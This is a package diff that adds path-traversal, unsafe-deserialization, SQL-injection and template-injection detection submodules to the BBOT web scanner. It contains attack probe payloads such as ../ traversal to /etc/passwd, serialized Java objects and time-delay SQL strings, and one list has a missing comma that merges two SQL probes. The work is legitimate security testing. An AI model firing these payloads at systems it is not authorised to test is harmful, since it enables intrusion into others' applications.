bbot 2.4.2__py3-none-any.whl → 2.4.2.6590rc0__py3-none-any.whl

bbot/modules/lightfuzz/submodules/path.py

@@ -0,0 +1,154 @@
+from .base import BaseLightfuzz
+from bbot.errors import HttpCompareError
+
+from urllib.parse import quote
+
+
+class path(BaseLightfuzz):
+    """
+    Detects path traversal and local file inclusion vulnerabilities
+
+    Techniques:
+
+    * Relative Path Traversal:
+       - Tests various relative path traversal patterns (../, ./, .../, etc.)
+       - Uses multiple encoding variations (URL encoding, double encoding)
+       - Attempts various path validation bypass techniques
+
+    * Absolute Path Traversal:
+       - Tests absolute paths for Windows (c:\\windows\\win.ini)
+       - Tests absolute paths for Unix (/etc/passwd)
+       - Tests null byte injection for extension bypass (%00)
+
+    Results are validated using multiple confirmations and WAF response filtering to eliminate false positives.
+    """
+
+    friendly_name = "Path Traversal"
+
+    async def fuzz(self):
+        cookies = self.event.data.get("assigned_cookies", {})
+        probe_value = self.incoming_probe_value(populate_empty=False)
+        if not probe_value:
+            self.debug(
+                f"Path Traversal detection requires original value, aborting [{self.event.data['type']}] [{self.event.data['name']}]"
+            )
+            return
+
+        # Single dot traversal tolerance test
+        path_techniques = {
+            "single-dot traversal tolerance (no-encoding)": {
+                "singledot_payload": f"./a/../{probe_value}",
+                "doubledot_payload": f"../a/../{probe_value}",
+            },
+            "single-dot traversal tolerance (no-encoding, leading slash)": {
+                "singledot_payload": f"/./a/../{probe_value}",
+                "doubledot_payload": f"/../a/../{probe_value}",
+            },
+            "single-dot traversal tolerance (url-encoding)": {
+                "singledot_payload": quote(f"./a/../{probe_value}".encode(), safe=""),
+                "doubledot_payload": quote(f"../a/../{probe_value}".encode(), safe=""),
+            },
+            "single-dot traversal tolerance (url-encoding, leading slash)": {
+                "singledot_payload": quote(f"/./a/../{probe_value}".encode(), safe=""),
+                "doubledot_payload": quote(f"/../a/../{probe_value}".encode(), safe=""),
+            },
+            "single-dot traversal tolerance (non-recursive stripping)": {
+                "singledot_payload": f"...//a/....//{probe_value}",
+                "doubledot_payload": f"....//a/....//{probe_value}",
+            },
+            "single-dot traversal tolerance (non-recursive stripping, leading slash)": {
+                "singledot_payload": f"/...//a/....//{probe_value}",
+                "doubledot_payload": f"/....//a/....//{probe_value}",
+            },
+            "single-dot traversal tolerance (double url-encoding)": {
+                "singledot_payload": f".%252fa%252f..%252f{probe_value}",
+                "doubledot_payload": f"..%252fa%252f..%252f{probe_value}",
+            },
+            "single-dot traversal tolerance (double url-encoding, leading slash)": {
+                "singledot_payload": f"%252f.%252fa%252f..%252f{probe_value}",
+                "doubledot_payload": f"%252f..%252fa%252f..%252f{probe_value}",
+            },
+        }
+
+        compiled_regex = self.lightfuzz.helpers.re.compile(r"/(?:[\w-]+/)*[\w-]+\.\w+")
+        linux_path_regex = await self.lightfuzz.helpers.re.match(compiled_regex, probe_value)
+        if linux_path_regex is not None:
+            original_path_only = "/".join(probe_value.split("/")[:-1])
+            original_filename_only = probe_value.split("/")[-1]
+            # Some servers validate the start of the path, so we construct our payload with the original path and filename
+            path_techniques["single-dot traversal tolerance (start of path validation)"] = {
+                "singledot_payload": f"{original_path_only}/./{original_filename_only}",
+                "doubledot_payload": f"{original_path_only}/../{original_filename_only}",
+            }
+
+        for path_technique, payloads in path_techniques.items():
+            iterations = 5  # one failed detection is tolerated, as long as its not the first run
+            confirmations = 0
+            while iterations > 0:
+                try:
+                    http_compare = self.compare_baseline(
+                        self.event.data["type"], probe_value, cookies, skip_urlencoding=True
+                    )
+                    singledot_probe = await self.compare_probe(
+                        http_compare,
+                        self.event.data["type"],
+                        payloads["singledot_payload"],
+                        cookies,
+                        skip_urlencoding=True,
+                    )
+                    doubledot_probe = await self.compare_probe(
+                        http_compare,
+                        self.event.data["type"],
+                        payloads["doubledot_payload"],
+                        cookies,
+                        skip_urlencoding=True,
+                    )
+                    # if singledot_probe[0] is true, the response is the same as the baseline. This indicates adding a single dot did not break the functionality
+                    # next, if doubledot_probe[0] is false, the response is different from the baseline. This further indicates that a real path is being manipulated
+                    # if doubledot_probe[3] is not None, the response is not empty.
+                    # if doubledot_probe[1] is not ["header"], the response is not JUST a header change.
+                    # "The requested URL was rejected" is a very common WAF error message which appears on 200 OK response, confusing detections
+                    if (
+                        singledot_probe[0] is True
+                        and doubledot_probe[0] is False
+                        and doubledot_probe[3] is not None
+                        and doubledot_probe[1] != ["header"]
+                        and "The requested URL was rejected" not in doubledot_probe[3].text
+                    ):
+                        confirmations += 1
+                        self.verbose(f"Got possible Path Traversal detection: [{str(confirmations)}] Confirmations")
+                        # only report if we have 3 confirmations
+                        if confirmations > 3:
+                            self.results.append(
+                                {
+                                    "type": "FINDING",
+                                    "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [{path_technique}]",
+                                }
+                            )
+                            # no need to report both techniques if they both work
+                            break
+                except HttpCompareError as e:
+                    iterations -= 1
+                    self.debug(e)
+                    continue
+
+                iterations -= 1
+                if confirmations == 0:
+                    break
+
+        # Absolute path test, covering Windows and Linux
+        absolute_paths = {
+            r"c:\\windows\\win.ini": "; for 16-bit app support",
+            "/etc/passwd": "daemon:x:",
+            "../../../../../etc/passwd%00.png": "daemon:x:",
+        }
+
+        for path, trigger in absolute_paths.items():
+            r = await self.standard_probe(self.event.data["type"], cookies, path, skip_urlencoding=True)
+            if r and trigger in r.text:
+                self.results.append(
+                    {
+                        "type": "FINDING",
+                        "description": f"POSSIBLE Path Traversal. {self.metadata()} Detection Method: [Absolute Path: {path}]",
+                    }
+                )

bbot/modules/lightfuzz/submodules/serial.py

@@ -0,0 +1,179 @@
+from .base import BaseLightfuzz
+from bbot.errors import HttpCompareError
+
+
+class serial(BaseLightfuzz):
+    """Finds parameters where serialized objects might be being deserialized.
+    It starts by performing a baseline with a specially-crafted non-serialized payload, separated by type (base64, hex, php raw).
+    This is designed to coax out an error that's not related to the decoding process.
+
+    After performing the baseline (Which by design may contain an error), we check for two possible deserialization cases:
+
+        1) Replacing the payload with a serialized object changes the status code to 200 (minus some string signatures to help prevent false positives)
+
+        2) If the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response.
+    """
+
+    friendly_name = "Unsafe Deserialization"
+
+    # Class-level constants
+    CONTROL_PAYLOAD_HEX = "f56124208220432ec767646acd2e6c6bc9622a62c5656f2eeb616e2f"
+    CONTROL_PAYLOAD_BASE64 = "4Wt5fYx5Y3rELn5myS5oa996Ji7IZ28uwGdha4x6YmuMfG992CA="
+    CONTROL_PAYLOAD_PHP_RAW = "z:0:{}"
+
+    BASE64_SERIALIZATION_PAYLOADS = {
+        "php_base64": "YTowOnt9",
+        "java_base64": "rO0ABXNyABFqYXZhLmxhbmcuQm9vbGVhbs0gcoDVnPruAgABWgAFdmFsdWV4cAA=",
+        "java_base64_string_error": "rO0ABXQABHRlc3Q=",
+        "java_base64_OptionalDataException": "rO0ABXcEAAAAAAEAAAABc3IAEGphdmEudXRpbC5IYXNoTWFwAAAAAAAAAAECAAJMAARrZXkxYgABAAAAAAAAAAJ4cHcBAAAAB3QABHRlc3Q=",
+        "dotnet_base64": "AAEAAAD/////AQAAAAAAAAAGAQAAAAdndXN0YXZvCw==",
+        "ruby_base64": "BAh7BjoKbE1FAAVJsg==",
+    }
+
+    HEX_SERIALIZATION_PAYLOADS = {
+        "java_hex": "ACED00057372000E6A6176612E6C616E672E426F6F6C65616ECD207EC0D59CF6EE02000157000576616C7565787000",
+        "java_hex_OptionalDataException": "ACED0005737200106A6176612E7574696C2E486173684D617000000000000000012000014C00046B6579317A00010000000000000278707000000774000474657374",
+        "dotnet_hex": "0001000000ffffffff01000000000000000601000000076775737461766f0b",
+    }
+
+    PHP_RAW_SERIALIZATION_PAYLOADS = {
+        "php_raw": "a:0:{}",
+    }
+
+    SERIALIZATION_ERRORS = [
+        "invalid user",
+        "cannot cast java.lang.string",
+        "dump format error",
+        "java.io.optionaldataexception",
+    ]
+
+    GENERAL_ERRORS = [
+        "Internal Error",
+        "Internal Server Error",
+        "The requested URL was rejected",
+    ]
+
+    def is_possibly_serialized(self, value):
+        # Use the is_base64 method from BaseLightfuzz via self
+        if self.is_base64(value):
+            return True
+
+        # Use the is_hex method from BaseLightfuzz via self
+        if self.is_hex(value):
+            return True
+
+        # List of common PHP serialized data prefixes
+        php_serialized_prefixes = [
+            "a:",  # Array
+            "O:",  # Object
+            "s:",  # String
+            "i:",  # Integer
+            "d:",  # Double
+            "b:",  # Boolean
+            "N;",  # Null
+        ]
+
+        # Check if the value starts with any of the PHP serialized prefixes
+        if any(value.startswith(prefix) for prefix in php_serialized_prefixes):
+            return True
+        return False
+
+    async def fuzz(self):
+        cookies = self.event.data.get("assigned_cookies", {})
+        control_payload_hex = self.CONTROL_PAYLOAD_HEX
+        control_payload_base64 = self.CONTROL_PAYLOAD_BASE64
+        control_payload_php_raw = self.CONTROL_PAYLOAD_PHP_RAW
+
+        base64_serialization_payloads = self.BASE64_SERIALIZATION_PAYLOADS
+        hex_serialization_payloads = self.HEX_SERIALIZATION_PAYLOADS
+        php_raw_serialization_payloads = self.PHP_RAW_SERIALIZATION_PAYLOADS
+
+        serialization_errors = self.SERIALIZATION_ERRORS
+        general_errors = self.GENERAL_ERRORS
+
+        probe_value = self.incoming_probe_value(populate_empty=False)
+        if probe_value:
+            if self.is_possibly_serialized(probe_value):
+                self.debug(
+                    f"Existing value is not ruled out for being a serialized object, proceeding [{self.event.data['type']}] [{self.event.data['name']}]"
+                )
+            else:
+                self.debug(
+                    f"The Serialization Submodule only operates when there is no original value, or when the original value could potentially be a serialized object, aborting [{self.event.data['type']}] [{self.event.data['name']}]"
+                )
+                return
+
+        try:
+            http_compare_hex = self.compare_baseline(self.event.data["type"], control_payload_hex, cookies)
+            http_compare_base64 = self.compare_baseline(self.event.data["type"], control_payload_base64, cookies)
+            http_compare_php_raw = self.compare_baseline(self.event.data["type"], control_payload_php_raw, cookies)
+        except HttpCompareError as e:
+            self.debug(f"HttpCompareError encountered: {e}")
+            return
+
+        # Proceed with payload probes
+        for payload_set, payload_baseline in [
+            (base64_serialization_payloads, http_compare_base64),
+            (hex_serialization_payloads, http_compare_hex),
+            (php_raw_serialization_payloads, http_compare_php_raw),
+        ]:
+            for type, payload in payload_set.items():
+                try:
+                    matches_baseline, diff_reasons, reflection, response = await self.compare_probe(
+                        payload_baseline, self.event.data["type"], payload, cookies
+                    )
+                except HttpCompareError as e:
+                    self.debug(f"HttpCompareError encountered: {e}")
+                    continue
+
+                if matches_baseline:
+                    self.debug(f"Payload {type} matches baseline, skipping")
+                    continue
+
+                self.debug(f"Probe result for {type}: {response}")
+
+                status_code = getattr(response, "status_code", 0)
+                if status_code == 0:
+                    continue
+
+                if diff_reasons == ["header"]:
+                    self.debug(f"Only header diffs found for {type}, skipping")
+                    continue
+
+                if status_code not in (200, 500):
+                    self.debug(f"Status code {status_code} not in (200, 500), skipping")
+                    continue
+
+                # if the status code changed to 200, and the response doesn't match our general error exclusions, we have a finding
+                self.debug(f"Potential finding detected for {type}, needs confirmation")
+                if (
+                    status_code == 200
+                    and "code" in diff_reasons
+                    and not any(
+                        error in response.text for error in general_errors
+                    )  # ensure the 200 is not actually an error
+                ):
+                    self.results.append(
+                        {
+                            "type": "FINDING",
+                            "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Error Resolution] Serialization Payload: [{type}]",
+                        }
+                    )
+                # if the first case doesn't match, we check for a telltale error string like "java.io.optionaldataexception" in the response.
+                # but only if the response is a 500, or a 200 with a body diff
+                elif status_code == 500 or (status_code == 200 and diff_reasons == ["body"]):
+                    self.debug(f"500 status code or body match for {type}")
+                    for serialization_error in serialization_errors:
+                        # check for the error string, but also ensure the error string isn't just always present in the response
+                        if (
+                            serialization_error in response.text.lower()
+                            and serialization_error not in payload_baseline.baseline.text.lower()
+                        ):
+                            self.debug(f"Error string '{serialization_error}' found in response for {type}")
+                            self.results.append(
+                                {
+                                    "type": "FINDING",
+                                    "description": f"POSSIBLE Unsafe Deserialization. {self.metadata()} Technique: [Differential Error Analysis] Error-String: [{serialization_error}] Payload: [{type}]",
+                                }
+                            )
+                            break

bbot/modules/lightfuzz/submodules/sqli.py

@@ -0,0 +1,187 @@
+from .base import BaseLightfuzz
+from bbot.errors import HttpCompareError
+
+import statistics
+
+
+class sqli(BaseLightfuzz):
+    """
+    Detects SQL injection vulnerabilities.
+
+    Techniques:
+
+    * Error-based Detection:
+       - Injects single quotes and observes error responses
+       - Tests quote escape sequence variations
+       - Matches against known SQL error patterns
+
+    * Time-based Blind Detection:
+       - Uses vendor-specific time delay payloads
+       - Confirms delays with statistical analysis
+       - Requires multiple confirmations to eliminate false positives
+    """
+
+    friendly_name = "SQL Injection"
+
+    expected_delay = 5
+    # These are common error strings that strongly indicate SQL injection
+    sqli_error_strings = [
+        "Unterminated string literal",
+        "Failed to parse string literal",
+        "error in your SQL syntax",
+        "syntax error at or near",
+        "Unknown column",
+        "unterminated quoted string",
+        "Unclosed quotation mark",
+        "Incorrect syntax near",
+        "SQL command not properly ended",
+        "string not properly terminated",
+    ]
+
+    def evaluate_delay(self, mean_baseline, measured_delay):
+        """
+        Evaluates if a measured delay falls within an expected range, indicating potential SQL injection.
+
+        Parameters:
+        - mean_baseline (float): The average baseline delay measured from non-injected requests.
+        - measured_delay (float): The delay measured from a potentially injected request.
+
+        Returns:
+        - bool: True if the measured delay is within the expected range or exactly twice the expected delay, otherwise False.
+
+        The function checks if the measured delay is within a margin of the expected delay or twice the expected delay,
+        accounting for cases where the injected statement might be executed twice.
+        """
+        margin = 1.5
+        if (
+            mean_baseline + self.expected_delay - margin
+            <= measured_delay
+            <= mean_baseline + self.expected_delay + margin
+        ):
+            return True
+        # check for exactly twice the delay, in case the statement gets placed in the query twice (a common occurrence)
+        elif (
+            mean_baseline + (self.expected_delay * 2) - margin
+            <= measured_delay
+            <= mean_baseline + (self.expected_delay * 2) + margin
+        ):
+            return True
+        else:
+            return False
+
+    async def fuzz(self):
+        cookies = self.event.data.get("assigned_cookies", {})
+        probe_value = self.incoming_probe_value(populate_empty=True)
+        http_compare = self.compare_baseline(
+            self.event.data["type"], probe_value, cookies, additional_params_populate_empty=True
+        )
+
+        try:
+            # send the with a single quote, and then another with two single quotes
+            single_quote = await self.compare_probe(
+                http_compare,
+                self.event.data["type"],
+                f"{probe_value}'",
+                cookies,
+                additional_params_populate_empty=True,
+            )
+            double_single_quote = await self.compare_probe(
+                http_compare,
+                self.event.data["type"],
+                f"{probe_value}''",
+                cookies,
+                additional_params_populate_empty=True,
+            )
+            # if the single quote probe response is different from the baseline
+            if single_quote[0] is False:
+                # check for common SQL error strings in the response
+                for sqli_error_string in self.sqli_error_strings:
+                    if sqli_error_string.lower() in single_quote[3].text.lower():
+                        self.results.append(
+                            {
+                                "type": "FINDING",
+                                "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [SQL Error Detection] Detected String: [{sqli_error_string}]",
+                            }
+                        )
+                        break
+            # if both probes were successful (and had a response)
+            if single_quote[3] and double_single_quote[3]:
+                # Ensure none of the status codes are "429"
+                if (
+                    single_quote[3].status_code != 429
+                    and double_single_quote[3].status_code != 429
+                    and http_compare.baseline.status_code != 429
+                ):  # prevent false positives from rate limiting
+                    # if the code changed in the single quote probe, and the code is NOT the same between that and the double single quote probe, SQL injection is indicated
+                    if "code" in single_quote[1] and (
+                        single_quote[3].status_code != double_single_quote[3].status_code
+                    ):
+                        self.results.append(
+                            {
+                                "type": "FINDING",
+                                "description": f"Possible SQL Injection. {self.metadata()} Detection Method: [Single Quote/Two Single Quote, Code Change ({http_compare.baseline.status_code}->{single_quote[3].status_code}->{double_single_quote[3].status_code})]",
+                            }
+                        )
+            else:
+                self.debug("Failed to get responses for both single_quote and double_single_quote")
+        except HttpCompareError as e:
+            self.verbose(f"Encountered HttpCompareError Sending Compare Probe: {e}")
+
+        # These are common SQL injection payloads for inducing an intentional delay across several different SQL database types
+        standard_probe_strings = [
+            f"'||pg_sleep({str(self.expected_delay)})--",  # postgres
+            f"1' AND (SLEEP({str(self.expected_delay)})) AND '",  # mysql
+            f"' AND (SELECT FROM DBMS_LOCK.SLEEP({str(self.expected_delay)})) AND '1'='1"  # oracle (not tested)
+            f"; WAITFOR DELAY '00:00:{str(self.expected_delay)}'--",  # mssql (not tested)
+        ]
+
+        baseline_1 = await self.standard_probe(
+            self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True
+        )
+        baseline_2 = await self.standard_probe(
+            self.event.data["type"], cookies, probe_value, additional_params_populate_empty=True
+        )
+
+        # get a baseline from two different probes. We will average them to establish a mean baseline
+        if baseline_1 and baseline_2:
+            baseline_1_delay = baseline_1.elapsed.total_seconds()
+            baseline_2_delay = baseline_2.elapsed.total_seconds()
+            mean_baseline = statistics.mean([baseline_1_delay, baseline_2_delay])
+
+            for p in standard_probe_strings:
+                confirmations = 0
+                for i in range(0, 3):
+                    # send the probe 3 times, and check if the delay is within the detection threshold
+                    r = await self.standard_probe(
+                        self.event.data["type"],
+                        cookies,
+                        f"{probe_value}{p}",
+                        additional_params_populate_empty=True,
+                        timeout=20,
+                    )
+                    if not r:
+                        self.debug("delay measure request failed")
+                        break
+
+                    d = r.elapsed.total_seconds()
+                    self.debug(f"measured delay: {str(d)}")
+                    if self.evaluate_delay(
+                        mean_baseline, d
+                    ):  # decide if the delay is within the detection threshold and constitutes a successful sleep execution
+                        confirmations += 1
+                        self.debug(
+                            f"{self.event.data['url']}:{self.event.data['name']}:{self.event.data['type']} Increasing confirmations, now: {str(confirmations)} "
+                        )
+                    else:
+                        break
+
+                if confirmations == 3:
+                    self.results.append(
+                        {
+                            "type": "FINDING",
+                            "description": f"Possible Blind SQL Injection. {self.metadata()} Detection Method: [Delay Probe ({p})]",
+                        }
+                    )
+
+        else:
+            self.debug("Could not get baseline for time-delay tests")

bbot/modules/lightfuzz/submodules/ssti.py

@@ -0,0 +1,39 @@
+from .base import BaseLightfuzz
+
+
+class ssti(BaseLightfuzz):
+    """
+    Detects server-side template injection vulnerabilities.
+
+    Techniques:
+
+    * Arithmetic Evaluation:
+       - Injects encoded and unencoded multiplication expressions to detect evaluation
+    """
+
+    friendly_name = "Server-side Template Injection"
+
+    async def fuzz(self):
+        cookies = self.event.data.get("assigned_cookies", {})
+        # These are common SSTI payloads, each attempting to trigger an integer multiplication which would produce an expected value
+        ssti_probes = [
+            "<%25%3d%201337*1337%20%25>",
+            "<%= 1337*1337 %>",
+            "${1337*1337}",
+            "%24%7b1337*1337%7d",
+            "1,787{{z}},569",
+        ]
+        for probe_value in ssti_probes:
+            r = await self.standard_probe(
+                self.event.data["type"], cookies, probe_value, allow_redirects=True, skip_urlencoding=True
+            )
+
+            # look for the expected value in the response
+            if r and ("1787569" in r.text or "1,787,569" in r.text):
+                self.results.append(
+                    {
+                        "type": "FINDING",
+                        "description": f"POSSIBLE Server-side Template Injection. {self.metadata()} Detection Method: [Integer Multiplication] Payload: [{probe_value}]",
+                    }
+                )
+                break